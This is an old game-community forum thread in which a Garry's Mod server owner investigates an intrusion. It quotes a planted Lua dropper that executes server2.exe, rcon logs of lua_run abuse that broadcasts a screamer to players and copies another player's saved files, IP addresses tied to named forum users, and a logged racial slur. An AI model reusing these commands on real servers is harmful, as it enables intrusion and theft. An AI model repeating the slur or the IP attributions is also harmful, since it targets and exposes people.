Srcds hacking bullshit, gained access to C: drive

Yeah so some bullshit started going on where GMans face and some screaming noise would flash on peoples screens, we brushed it off and assumed it was some client dicking around and we laughed about it. Later on my antivirus started going batshit about files being placed on my C: drive, specifically some shit called server2.exe. I take a look around my srcds folder, and find something called asd.lua, I don’t know if there’s any other bullshit hiding around my srcds folder


require("cmd")  
cmd.exec("C:\server2.exe")  

I guess that’s the part that runs the placed virus, but where’s the part that actually places it?

wat2do

Putting your head between your legs and shutting down your server machine? Setting new security protocols in place? Someone who shouldn’t is in your computer. Also try to close down some ports on your router.


L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay_texture Models/Gman/gman_facehirez ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay 1 ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' play npc/stalker/go_alert2a.wav ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay_texture Models/Gman/gman_facehirez ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay 1 ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' play npc/stalker/go_alert2a.wav ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay_texture Models/Gman/gman_facehirez ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( [[LocalPlayer ( ) : ConCommand ( ' pp_mat_overlay 1 ' ) ]] )"
L 12/06/2009 - 01:07:05: rcon from "75.175.22.53:64886": command "lua_run BroadcastLua ( 

Some bullshit related to the gman screamer thing I’m sure.

[editline]08:20AM[/editline]


L 12/06/2009 - 01:20:59: "Console<0><Console><Console>" say "I LOVE TEH PROTAL"
L 12/06/2009 - 01:20:59: rcon from "75.175.22.53:64886": command "say I LOVE TEH PROTAL"
L 12/06/2009 - 01:21:09: "Console<0><Console><Console>" say "AND BUTTSEX"
L 12/06/2009 - 01:21:09: rcon from "75.175.22.53:64886": command "say AND BUTTSEX"
L 12/06/2009 - 01:21:21: "Console<0><Console><Console>" say "IM IAN!"
L 12/06/2009 - 01:21:21: rcon from "75.175.22.53:64886": command "say IM IAN!"
L 12/06/2009 - 01:21:37: "Console<0><Console><Console>" say "It ' s IAN!"
L 12/06/2009 - 01:21:37: rcon from "75.175.22.53:64886": command "say It ' s IAN!"
L 12/06/2009 - 01:21:49: "Console<0><Console><Console>" say "it ' s ian goddamnit"
L 12/06/2009 - 01:21:49: rcon from "75.175.22.53:64886": command "say it ' s ian goddamnit"
L 12/06/2009 - 01:22:09: "Console<0><Console><Console>" say "Candymountain is buttsex with me, ian."
L 12/06/2009 - 01:22:09: rcon from "75.175.22.53:64886": command "say Candymountain is buttsex with me, ian."
L 12/06/2009 - 01:22:27: "Candymountai<28><STEAM_ID_PENDING><>" connected, address "74.237.86.202:27005"
L 12/06/2009 - 01:22:28: "Candymountai<28><STEAM_0:1:7332680><>" STEAM USERID validated
L 12/06/2009 - 01:22:31: "Console<0><Console><Console>" say "IT ' S IAN GODDAMNIT"
L 12/06/2009 - 01:22:31: rcon from "75.175.22.53:64886": command "say IT ' S IAN GODDAMNIT"
L 12/06/2009 - 01:22:59: Lua Error: :1: bad argument #1 to 'Read' (string expected, got table)
L 12/06/2009 - 01:22:59: rcon from "72.214.98.146:55762": command "lua_run local d = "adv_duplicator/STEAM_0_1_6452693/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do local r = file.Read(l) file.Write("adv_duplicator/STEAM_0:1:18010810/" .. f, r) end"
L 12/06/2009 - 01:23:20: "Console<0><Console><Console>" say "I wish I weren ' t banned from vent."
L 12/06/2009 - 01:23:20: rcon from "75.175.22.53:64886": command "say I wish I weren ' t banned from vent."
L 12/06/2009 - 01:23:35: rcon from "72.214.98.146:55762": command "lua_run local d = "adv_duplicator/STEAM_0_1_6452693/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do local r = file.Read(d..f) file.Write("adv_duplicator/STEAM_0:1:18010810/" .. f, r) end"
L 12/06/2009 - 01:23:55: "Candymountai<28><STEAM_0:1:7332680><>" entered the game
L 12/06/2009 - 01:23:56: rcon from "72.214.98.146:55762": command "lua_run local d = "adv_duplicator/STEAM_0_1_6452693/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do local r = file.Read(d..f) file.Write("adv_duplicator/STEAM_0:1:18010810/" .. f, r) Msg(l) end"
L 12/06/2009 - 01:24:05: "Candymountai<28><STEAM_0:1:7332680><Team>" say "NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER NIGGER "
L 12/06/2009 - 01:24:17: rcon from "72.214.98.146:55762": command "lua_run local d = "adv_duplicator/STEAM_0_1_6452693/" local l = file.Find(d.."*.txt") for _, f in pairs(l) do local r = file.Read(d..f) file.Write("adv_duplicator/STEAM_0:1:18010810/" .. f, r) Msg(f) end"
L 12/06/2009 - 01:24:23: "Console<0><Console><Console>" say "who ' s in vent"
L 12/06/2009 - 01:24:23: rcon from "75.175.22.53:64886": command "say who ' s in vent"
L 12/06/2009 - 01:24:35: "Console<0><Console><Console>" say "Not me"
L 12/06/2009 - 01:24:35: rcon from "72.214.98.146:55762": command "say Not me"
L 12/06/2009 - 01:25:17: "Console<0><Console><Console>" say "Thou Ornust has came to save you all."
L 12/06/2009 - 01:25:17: rcon from "72.214.98.146:55762": command "say Thou Ornust has came to save you all."

Actually I think the gman stuff was just someone dicking around with rcon.

Ah, the gman screamer. It was created by this guy on a server called Lets go to my room Pig! hosted by Maso. all it does is puts a small screamer in front of your players face. It may look like a large ball around you, but its really just big enough to cover your head.

Edit: And edberg is right, the screamer is made of npc_stalker_go alert and gmans face texture. Also including a picture of blood.

Guy doesn’t even make his dropper undetected? Smart guy.

Lol he didn’t even try to hide it? :V

It’s safe to say at any the all hope could be lost for that server. Run lotsa antiviruses :V

[editline]11:51PM[/editline]

time* stupid iPhone

Or wipe the C drive and start over… ( I would dban it )

Wouldn’t suprise me if that little cookie was using this to get the rcon.

There is a metamod plugin going around which will kill this though.

D-FENS doesn’t do anything, stop trying.

Why? It didn’t ruin anything since my antivirus caught it when srcds tried to run the file, all I did was delete the file and shut down the server until this issue gets resolved. I just wanna know what got it there in the first place.

Those IP addresses have accounts on Facepunch:

75.175.22.53 is “SBII Gunz”.
72.214.98.146 is jonney934 / Milentrary321 / Gamma63.

Anyone who abuses the Lua scripting capabilities in Gmod gets all they deserve from being singled out.

How do you link IP addresses to facepunch?

nvm dumb question.

My server is currently being DoS’d :stuck_out_tongue: I changed port and it runs fine…

DAF Doesn’t seem to be working… WHere does the vdf go? orangebox/ ? orangebox/garrysmod?

Nevermind goes in addons even though the vdf pointer suggets otherwise.

:downs:

Thanks bro, that I singled out the jonney guy a while ago using really old server logs but he came up with story about how he has a dynamic IP or something, dunno if it’s true.

[bergenpolitics] So is Jonney banned now? Weird, I thought he was a frequent player, might’ve been a dummy IP IDK[/bergenpolitics]

It indeed could be a masked IP. All of those people could be the same person! :tinfoil:

God fucking dammit, fucking Andrew telling me to enter some commands into rcon, also I never made an account called Gamma, whats the email on it, if Gamma is not connected to any of my emails then that proves someone else could be on my IP.

derp

To anybody wondering, I was talking with Edberg on vent when this happened, it turned out my friend was on my router doing this shit. I have since disallowed connections from his computer and changed my router’s WEP key.

@above wat.

Which leads me to believe it was you, someone was saying shit that only a vent user would say, and you are the only one who actually goes there.

Yeah, Andrew essentially told me to “cover” for him so he would not take “all” the blame, god I need to screen my convos more often. Now the virus stuff was not me, if you know about the exploit you had to join the server before you could upload any file, the last time I joined the virus was not there, so if you maybe can link the time the file was created to the time a player was on the server then you possibly could find who uploaded the virus.